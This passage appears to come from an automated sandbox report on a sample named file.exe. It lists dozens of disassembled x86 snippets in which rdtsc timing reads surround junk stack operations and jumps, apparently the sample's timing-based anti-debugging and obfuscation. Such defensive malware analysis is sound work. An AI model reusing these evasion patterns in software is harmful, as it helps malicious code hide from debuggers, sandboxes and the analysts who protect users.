                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D101C second address: 9D107B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 sub dword ptr [ebp+122D1B49h], ecx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 movsx ebx, cx 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f mov di, BAA4h 0x00000023 mov eax, dword ptr [ebp+122D0779h] 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F2EE4767538h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 or dword ptr [ebp+122D55EBh], eax 0x00000049 push FFFFFFFFh 0x0000004b xor dword ptr [ebp+122D1B59h], eax 0x00000051 nop 0x00000052 push eax 0x00000053 push edx 0x00000054 push ecx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1E01 second address: 9D1E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2EE474417Ch 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 je 00007F2EE474417Ch 0x00000016 mov ebx, dword ptr [ebp+1247C20Ch] 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D2B95h], esi 0x00000024 push eax 0x00000025 pushad 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D107B second address: 9D1080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1E33 second address: 9D1E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1080 second address: 9D108A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F2EE4767536h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D108A second address: 9D109C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jo 00007F2EE474417Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5DDE second address: 9D5DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D81AF second address: 9D81B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D81B5 second address: 9D81BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97FAC7 second address: 97FACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC380 second address: 9DC389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFBD5 second address: 9DFBDF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2EE4744176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFBDF second address: 9DFC1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F2EE4767542h 0x00000011 jnl 00007F2EE476753Ch 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jo 00007F2EE4767549h 0x00000023 jmp 00007F2EE4767543h 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5C4B second address: 9E5C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5C4F second address: 9E5C80 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2EE4767536h 0x00000008 ja 00007F2EE4767536h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2EE4767549h 0x00000017 jbe 00007F2EE4767536h 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6633 second address: 9E6639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6639 second address: 9E664E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE476753Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6A94 second address: 9E6AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F2EE4744178h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6C1A second address: 9E6C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F2EE4767536h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6C24 second address: 9E6C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA38B second address: 9EA39B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA39B second address: 9EA3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DF01 second address: 97DF18 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2EE476753Ah 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DF18 second address: 97DF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DF1E second address: 97DF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DF24 second address: 97DF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DF29 second address: 97DF2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0B8B second address: 9C0BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2EE4744185h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0BA6 second address: 9C0BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0BAA second address: 9A0D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnc 00007F2EE4744185h 0x0000000e nop 0x0000000f mov dx, ax 0x00000012 call dword ptr [ebp+122D23E6h] 0x00000018 je 00007F2EE4744182h 0x0000001e jmp 00007F2EE474417Ch 0x00000023 jc 00007F2EE47441BCh 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F2EE4744180h 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0D4B second address: 9C0D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767543h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b jnp 00007F2EE476753Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C126E second address: 9C1275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1421 second address: 9C1427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1654 second address: 9C1658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1658 second address: 9C1662 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2EE4767536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1A21 second address: 9C1A51 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 or cx, 96E0h 0x0000000e push 0000001Eh 0x00000010 sub dx, A09Fh 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2EE4744188h 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1914 second address: 9A191A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A191A second address: 9A191E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDC5F second address: 9EDC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDC65 second address: 9EDC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F2EE4744181h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2EE474417Ch 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDC89 second address: 9EDC8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE0AA second address: 9EE0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE474417Bh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE0BA second address: 9EE0C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2EE4767538h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE6C4 second address: 9EE6CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE6CA second address: 9EE6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EE6D0 second address: 9EE6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3E7C second address: 9F3E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4023 second address: 9F404A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE474417Ah 0x00000009 jmp 00007F2EE4744188h 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4E1A second address: 9F4E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB6F6 second address: 9FB71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2EE474418Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F2EE4744176h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FB71E second address: 9FB722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA3DF second address: 9FA3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA3EB second address: 9FA3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA3F1 second address: 9FA3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA3F9 second address: 9FA419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE4767541h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F2EE4767536h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA419 second address: 9FA41D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FAAA5 second address: 9FAAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F2EE476753Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FAAB2 second address: 9FAABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FABEF second address: 9FABF5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FABF5 second address: 9FABFF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2EE474417Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FAD3F second address: 9FAD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9F61 second address: 9F9F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9F73 second address: 9F9F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F2EE4767536h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9F7F second address: 9F9F89 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2EE4744176h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00B50 second address: A00B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2EE4767536h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00B5A second address: A00B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00B60 second address: A00B8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE4767547h 0x00000009 jmp 00007F2EE4767540h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A008F1 second address: A008F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A037E2 second address: A037EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2EE4767536h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A037EC second address: A037F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08086 second address: A080A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767543h 0x00000007 pushad 0x00000008 jns 00007F2EE4767536h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A080A4 second address: A080AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A080AA second address: A080B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A080B6 second address: A080BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08226 second address: A0822C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0822C second address: A08230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08230 second address: A08253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F2EE4767546h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08509 second address: A08525 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744188h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08525 second address: A0852B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0852B second address: A08531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A08531 second address: A0853B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2EE4767536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E62E second address: A0E652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE4744185h 0x00000009 pop edi 0x0000000a jbe 00007F2EE474417Eh 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E652 second address: A0E668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jp 00007F2EE4767536h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F2EE4767536h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CE61 second address: A0CE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CE67 second address: A0CE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CFC8 second address: A0CFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CFCC second address: A0CFD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D15B second address: A0D15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D47E second address: A0D495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE4767543h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D495 second address: A0D499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D499 second address: A0D4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F2EE4767548h 0x0000000e jmp 00007F2EE4767542h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D4B9 second address: A0D4C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D4C0 second address: A0D4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D4C6 second address: A0D4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D4CF second address: A0D4D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1839 second address: 9C183D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C183D second address: 9C1847 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2EE4767536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1847 second address: 9C18F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744189h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c je 00007F2EE4744176h 0x00000012 pop eax 0x00000013 pop edx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F2EE4744178h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D1C44h], edi 0x00000035 sub dword ptr [ebp+1247A549h], eax 0x0000003b mov ebx, dword ptr [ebp+124858C2h] 0x00000041 jmp 00007F2EE4744181h 0x00000046 add eax, ebx 0x00000048 push 00000000h 0x0000004a push edx 0x0000004b call 00007F2EE4744178h 0x00000050 pop edx 0x00000051 mov dword ptr [esp+04h], edx 0x00000055 add dword ptr [esp+04h], 0000001Dh 0x0000005d inc edx 0x0000005e push edx 0x0000005f ret 0x00000060 pop edx 0x00000061 ret 0x00000062 jnl 00007F2EE4744176h 0x00000068 mov di, bx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F2EE474417Dh 0x00000073 rdtsc
